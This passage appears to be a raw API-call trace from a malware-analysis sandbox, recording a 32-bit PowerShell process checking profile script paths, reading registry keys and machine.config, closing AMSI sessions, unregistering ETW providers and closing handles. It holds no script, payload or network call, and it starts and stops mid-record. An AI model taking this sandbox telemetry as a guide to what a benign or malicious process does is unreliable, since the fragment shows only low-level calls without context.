lpFileInformation=0x74e880 | out: lpFileInformation=0x74e880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0101.990] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x74e800) returned 1 [0101.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4c [0101.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x4c, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b [0101.990] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x74e804) returned 1 [0101.990] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x74e880 | out: lpFileInformation=0x74e880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0101.990] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x74e800) returned 1 [0101.990] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x38 [0101.990] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x38, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x37 [0101.990] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x74e804) returned 1 [0101.990] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\fd1hvy\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x74e880 | out: lpFileInformation=0x74e880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0101.991] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x74e800) returned 1 [0101.991] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4d [0101.991] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x4d, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4c [0101.991] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x74e804) returned 1 [0101.991] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\fd1hvy\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x74e880 | out: lpFileInformation=0x74e880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0101.991] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x74e800) returned 1 [0101.991] QueryPerformanceCounter (in: lpPerformanceCount=0x74e8e4 | out: lpPerformanceCount=0x74e8e4*=19574313473) returned 1 [0101.991] GetCurrentProcessId () returned 0xd2c [0101.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x58694e8, Length=0x27500, ResultLength=0x74e868 | out: SystemInformation=0x58694e8, ResultLength=0x74e868*=0x1a5a0) returned 0x0 [0103.595] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x6b8 [0103.595] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x6b4 [0103.595] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6bc [0103.596] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6c0 [0103.596] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x6c4 [0103.596] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x6c8 [0103.596] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6cc [0103.596] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6d0 [0103.596] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x6d4 [0103.596] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x6d8 [0103.596] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6dc [0103.596] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6e0 [0103.608] SetEvent (hEvent=0x6c0) returned 1 [0103.608] SetEvent (hEvent=0x6b8) returned 1 [0103.608] SetEvent (hEvent=0x6b4) returned 1 [0103.608] SetEvent (hEvent=0x6bc) returned 1 [0103.609] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6e4 [0103.610] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x74e76c | out: phkResult=0x74e76c*=0x6e8) returned 0x0 [0103.610] RegQueryValueExW (in: hKey=0x6e8, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x74e78c, lpData=0x0, lpcbData=0x74e788*=0x0 | out: lpType=0x74e78c*=0x0, lpData=0x0, lpcbData=0x74e788*=0x0) returned 0x2 [0103.611] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x6ec [0103.612] SetEvent (hEvent=0x6ec) returned 1 [0114.027] AmsiCloseSession () returned 0x2fd77b0 [0114.027] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x434 [0114.027] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x790 [0114.027] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x438 [0114.028] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7a4 [0114.028] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x7a8 [0114.028] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x7ac [0114.028] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7b0 [0114.028] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7b4 [0114.028] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x7b8 [0114.028] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x7bc [0114.028] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7c0 [0114.028] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7c4 [0114.028] SetEvent (hEvent=0x7a4) returned 1 [0114.028] SetEvent (hEvent=0x434) returned 1 [0114.028] SetEvent (hEvent=0x790) returned 1 [0114.028] SetEvent (hEvent=0x438) returned 1 [0114.028] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7c8 [0114.029] SetEvent (hEvent=0x6ec) returned 1 [0114.709] SetEvent (hEvent=0x7a8) returned 1 [0114.709] SetEvent (hEvent=0x7ac) returned 1 [0114.709] SetEvent (hEvent=0x7b0) returned 1 [0115.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x74db84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0115.268] CoTaskMemAlloc (cb=0x20c) returned 0x709eb58 [0115.268] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x709eb58, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0115.269] CoTaskMemFree (pv=0x709eb58) [0115.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0115.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x3a, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0115.272] GetCurrentProcess () returned 0xffffffff [0115.272] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x74deec | out: TokenHandle=0x74deec*=0x7d0) returned 1 [0115.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2f [0115.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x2f, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0115.322] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x74dee4 | out: lpFileInformation=0x74dee4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a29ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97df7583, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97df7583, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0115.386] GetFileSize (in: hFile=0x7d4, lpFileSizeHigh=0x74dee0 | out: lpFileSizeHigh=0x74dee0*=0x0) returned 0x8c8f [0115.387] ReadFile (in: hFile=0x7d4, lpBuffer=0x4bbf230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x74de9c, lpOverlapped=0x0 | out: lpBuffer=0x4bbf230*, lpNumberOfBytesRead=0x74de9c*=0x1000, lpOverlapped=0x0) returned 1 [0115.487] ReadFile (in: hFile=0x7d4, lpBuffer=0x4bbf230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x74dd48, lpOverlapped=0x0 | out: lpBuffer=0x4bbf230*, lpNumberOfBytesRead=0x74dd48*=0x1000, lpOverlapped=0x0) returned 1 [0115.489] ReadFile (in: hFile=0x7d4, lpBuffer=0x4bbf230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x74dbfc, lpOverlapped=0x0 | out: lpBuffer=0x4bbf230*, lpNumberOfBytesRead=0x74dbfc*=0x1000, lpOverlapped=0x0) returned 1 [0115.489] ReadFile (in: hFile=0x7d4, lpBuffer=0x4bbf230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x74dbfc, lpOverlapped=0x0 | out: lpBuffer=0x4bbf230*, lpNumberOfBytesRead=0x74dbfc*=0x1000, lpOverlapped=0x0) returned 1 [0115.489] ReadFile (in: hFile=0x7d4, lpBuffer=0x4bbf230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x74dbfc, lpOverlapped=0x0 | out: lpBuffer=0x4bbf230*, lpNumberOfBytesRead=0x74dbfc*=0x1000, lpOverlapped=0x0) returned 1 [0115.490] ReadFile (in: hFile=0x7d4, lpBuffer=0x4bbf230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x74db34, lpOverlapped=0x0 | out: lpBuffer=0x4bbf230*, lpNumberOfBytesRead=0x74db34*=0x1000, lpOverlapped=0x0) returned 1 [0115.609] ReadFile (in: hFile=0x7d4, lpBuffer=0x4bbf230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x74dcb8, lpOverlapped=0x0 | out: lpBuffer=0x4bbf230*, lpNumberOfBytesRead=0x74dcb8*=0x1000, lpOverlapped=0x0) returned 1 [0115.609] ReadFile (in: hFile=0x7d4, lpBuffer=0x4bbf230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x74dbc4, lpOverlapped=0x0 | out: lpBuffer=0x4bbf230*, lpNumberOfBytesRead=0x74dbc4*=0x1000, lpOverlapped=0x0) returned 1 [0115.610] ReadFile (in: hFile=0x7d4, lpBuffer=0x4bbf230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x74dbc4, lpOverlapped=0x0 | out: lpBuffer=0x4bbf230*, lpNumberOfBytesRead=0x74dbc4*=0xc8f, lpOverlapped=0x0) returned 1 [0115.610] ReadFile (in: hFile=0x7d4, lpBuffer=0x4bbf230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x74dc88, lpOverlapped=0x0 | out: lpBuffer=0x4bbf230*, lpNumberOfBytesRead=0x74dc88*=0x0, lpOverlapped=0x0) returned 1 [0115.610] CloseHandle (hObject=0x7d4) returned 1 [0115.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x74db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0115.611] CoTaskMemAlloc (cb=0x20c) returned 0x709eb58 [0115.611] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x709eb58, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0115.611] CoTaskMemFree (pv=0x709eb58) [0115.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0115.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x3a, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0115.612] GetCurrentProcess () returned 0xffffffff [0115.612] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x74e034 | out: TokenHandle=0x74e034*=0x7d4) returned 1 [0115.613] GetCurrentProcess () returned 0xffffffff [0115.613] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x74e034 | out: TokenHandle=0x74e034*=0x798) returned 1 [0115.615] GetCurrentProcess () returned 0xffffffff [0115.615] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x74deec | out: TokenHandle=0x74deec*=0x7d8) returned 1 [0115.615] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x74dee4 | out: lpFileInformation=0x74dee4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0115.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0115.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x41, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0115.616] GetCurrentProcess () returned 0xffffffff [0115.617] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x74e034 | out: TokenHandle=0x74e034*=0x7dc) returned 1 [0115.617] GetCurrentProcess () returned 0xffffffff [0115.617] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x74e034 | out: TokenHandle=0x74e034*=0x7e0) returned 1 [0115.713] GetCurrentProcess () returned 0xffffffff [0115.713] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x74de94 | out: TokenHandle=0x74de94*=0x7e4) returned 1 [0115.731] GetCurrentProcess () returned 0xffffffff [0115.731] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x74dea4 | out: TokenHandle=0x74dea4*=0x7e8) returned 1 [0115.741] CoCreateGuid (in: pguid=0x74e250 | out: pguid=0x74e250*(Data1=0x4dc334b0, Data2=0xf0cc, Data3=0x480c, Data4=([0]=0xbd, [1]=0x62, [2]=0x50, [3]=0xa6, [4]=0x4a, [5]=0xda, [6]=0x65, [7]=0xdf))) returned 0x0 [0115.745] ReportEventW (hEventLog=0x74e0004, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x4bdc2f8*="Stopped", lpRawData=0x4bdc220) returned 1 [0115.838] AmsiCloseSession () returned 0x2fd77b0 [0115.838] AmsiUninitialize () returned 0x1 [0116.470] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0116.473] CoGetContextToken (in: pToken=0x74f950 | out: pToken=0x74f950) returned 0x0 [0116.473] CObjectContext::QueryInterface () returned 0x0 [0116.473] CObjectContext::GetCurrentThreadType () returned 0x0 [0116.473] Release () returned 0x0 [0116.475] CoGetContextToken (in: pToken=0x74f654 | out: pToken=0x74f654) returned 0x0 [0116.475] CObjectContext::QueryInterface () returned 0x0 [0116.475] CObjectContext::GetCurrentThreadType () returned 0x0 [0116.475] Release () returned 0x0 [0116.478] CoGetContextToken (in: pToken=0x74f654 | out: pToken=0x74f654) returned 0x0 [0116.478] CObjectContext::QueryInterface () returned 0x0 [0116.478] CObjectContext::GetCurrentThreadType () returned 0x0 [0116.478] Release () returned 0x0 [0116.504] CoGetContextToken (in: pToken=0x74f654 | out: pToken=0x74f654) returned 0x0 [0116.504] CObjectContext::QueryInterface () returned 0x0 [0116.504] CObjectContext::GetCurrentThreadType () returned 0x0 [0116.504] Release () returned 0x0 [0116.525] CoGetContextToken (in: pToken=0x74f674 | out: pToken=0x74f674) returned 0x0 [0116.525] CObjectContext::QueryInterface () returned 0x0 [0116.525] CObjectContext::GetCurrentThreadType () returned 0x0 [0116.525] Release () returned 0x0 [0116.526] CoUninitialize () Thread: id = 31 os_tid = 0x58 Thread: id = 32 os_tid = 0xdcc Thread: id = 33 os_tid = 0x6dc [0059.376] CoGetContextToken (in: pToken=0x462fb14 | out: pToken=0x462fb14) returned 0x0 [0059.376] CObjectContext::QueryInterface () returned 0x0 [0059.376] CObjectContext::GetCurrentThreadType () returned 0x0 [0059.376] Release () returned 0x0 [0059.376] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0059.376] RoInitialize () returned 0x1 [0059.376] RoUninitialize () returned 0x0 [0097.866] CoGetContextToken (in: pToken=0x462fb00 | out: pToken=0x462fb00) returned 0x0 [0097.866] CoGetContextToken (in: pToken=0x462fa80 | out: pToken=0x462fa80) returned 0x0 [0097.867] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x1 [0097.867] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x0 [0097.867] CloseHandle (hObject=0x620) returned 1 [0097.869] CertFreeCertificateContext (pCertContext=0x6fe1450) returned 1 [0097.870] CloseHandle (hObject=0x638) returned 1 [0116.475] EtwEventUnregister (RegHandle=0xb07f48) returned 0x0 [0116.475] EtwEventUnregister (RegHandle=0xb08458) returned 0x0 [0116.475] EtwEventUnregister (RegHandle=0x6fce0f0) returned 0x0 [0116.476] EtwEventUnregister (RegHandle=0x6fce2a0) returned 0x0 [0116.476] EtwEventUnregister (RegHandle=0x6fce378) returned 0x0 [0116.476] EtwEventUnregister (RegHandle=0x6fce450) returned 0x0 [0116.476] EtwEventUnregister (RegHandle=0x6fcf1d0) returned 0x0 [0116.476] EtwEventUnregister (RegHandle=0x71f5c58) returned 0x0 [0116.494] CloseHandle (hObject=0x648) returned 1 [0116.497] CloseHandle (hObject=0x6c0) returned 1 [0116.498] CloseHandle (hObject=0x6bc) returned 1 [0116.498] CloseHandle (hObject=0x6b4) returned 1 [0116.498] CloseHandle (hObject=0x6b8) returned 1 [0116.499] CloseHandle (hObject=0x7e4) returned 1 [0116.499] CloseHandle (hObject=0x7c8) returned 1 [0116.499] CloseHandle (hObject=0x7c4) returned 1 [0116.499] CloseHandle (hObject=0x7c0) returned 1 [0116.500] CloseHandle (hObject=0x7bc) returned 1 [0116.501] CloseHandle (hObject=0x7b8) returned 1 [0116.501] CloseHandle (hObject=0x7b4) returned 1 [0116.501] CloseHandle (hObject=0x7b0) returned 1 [0116.501] CloseHandle (hObject=0x7ac) returned 1 [0116.502] CloseHandle (hObject=0x7a8) returned 1 [0116.502] CloseHandle (hObject=0x7a4) returned 1 [0116.502] CloseHandle (hObject=0x438) returned 1 [0116.503] CloseHandle (hObject=0x790) returned 1 [0116.511] DeregisterEventSource (hEventLog=0x74e0004) returned 1 [0116.515] CloseHandle (hObject=0x434) returned 1 [0116.516] CloseHandle (hObject=0x7e0) returned 1 [0116.516] CloseHandle (hObject=0x628) returned 1 [0116.517] CloseHandle (hObject=0x7dc) returned 1 [0116.518] CloseHandle (hObject=0x7d8) returned 1 [0116.518] CloseHandle (hObject=0x798) returned 1 [0116.518] CloseHandle (hObject=0x7d4) returned 1 [0116.519] CloseHandle (hObject=0xe8) returned 1 [0116.519] CloseHandle (hObject=0x7d0) returned 1 [0116.519] CloseHandle (hObject=0x7e8) returned 1 [0116.520] RegCloseKey (hKey=0x6e8) returned 0x0 [0116.520] LocalFree (hMem=0xb7ad50) returned 0x0 [0116.521] CloseHandle (hObject=0x6e4) returned 1 [0116.521] RegCloseKey (hKey=0x80000004) returned 0x0 [0116.522] CloseHandle (hObject=0x6e0) returned 1 [0116.522] CloseHandle (hObject=0x6dc) returned 1 [0116.522] CloseHandle (hObject=0x6d8) returned 1 [0116.522] CloseHandle (hObject=0x6d4) returned 1 [0116.523] CloseHandle (hObject=0x6d0) returned 1 [0116.523] CloseHandle (hObject=0x6cc) returned 1 [0116.523] CloseHandle (hObject=0x6c8) returned 1 [0116.523] CloseHandle (hObject=0x6c4) returned 1 [0116.524] CoGetContextToken (in: pToken=0x462f750 | out: pToken=0x462f750) returned 0x0 [0116.524] CoGetContextToken (in: pToken=0x462f6d0 | out: pToken=0x462f6d0) returned 0x0 [0116.524] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x2 [0116.525] Release () returned 0x1 [0116.525] SleepEx (dwMilliseconds=0xffffffff, bAlertable=0) Thread: id = 36 os_tid = 0xf8c Thread: id = 37 os_tid = 0x1268 Thread: id = 38 os_tid = 0xe8c Thread: id = 39 os_tid = 0x1280 [0074.698] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0074.699] CoGetContextToken (in: pToken=0x6c3fc74 | out: pToken=0x6c3fc74) returned 0x0 [0074.699] CObjectContext::QueryInterface () returned 0x0 [0074.699] CObjectContext::GetCurrentThreadType () returned 0x0 [0074.700] Release () returned 0x0 [0074.700] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0074.700] CoUninitialize () [0074.700] RoInitialize () returned 0x1 [0074.700] RoUninitialize () returned 0x0 [0075.358] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x6c3e8c8 | out: phkResult=0x6c3e8c8*=0x0) returned 0x2 [0075.359] RegCloseKey (hKey=0x80000002) returned 0x0 [0075.423] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x104, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87 [0075.430] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x88 [0075.430] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x88, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87 [0075.431] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c3f010) returned 1 [0075.432] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x6c3f08c | out: lpFileInformation=0x6c3f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71ce8766, ftCreationTime.dwHighDateTime=0x1d32794, ftLastAccessTime.dwLowDateTime=0x71ce8766, ftLastAccessTime.dwHighDateTime=0x1d32794, ftLastWriteTime.dwLowDateTime=0x71d0e9d1, ftLastWriteTime.dwHighDateTime=0x1d32794, 